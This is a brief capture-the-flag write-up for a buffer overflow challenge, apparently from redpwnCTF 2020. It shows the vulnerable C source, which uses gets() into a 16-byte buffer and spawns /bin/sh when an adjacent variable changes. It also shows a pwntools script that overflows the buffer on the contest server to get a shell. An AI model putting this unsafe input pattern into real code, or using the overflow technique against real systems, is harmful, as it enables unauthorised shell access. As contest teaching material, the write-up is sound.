Rating: 1.0

A simple buffer overflow challenge

```
#include <stdio.h>
#include <string.h>

int main(void)
{
long code = 0;
char name[16];

setbuf(stdout, NULL);
setbuf(stdin, NULL);
setbuf(stderr, NULL);

puts("Welcome to coffer overflow, where our coffers are overfilling with bytes ;)");
puts("What do you want to fill your coffer with?");

gets(name);

if(code != 0) {
system("/bin/sh");
}
}
```
Exploit script
```
from pwn import *
key=p32(0xcafebabe)
sock=remote('2020.redpwnc.tf',31255)
sock.sendline(b'A' * 24 + key)
sock.interactive()
```

Original writeup (https://anandu.net/blog/redpwnctf2020-writeup/).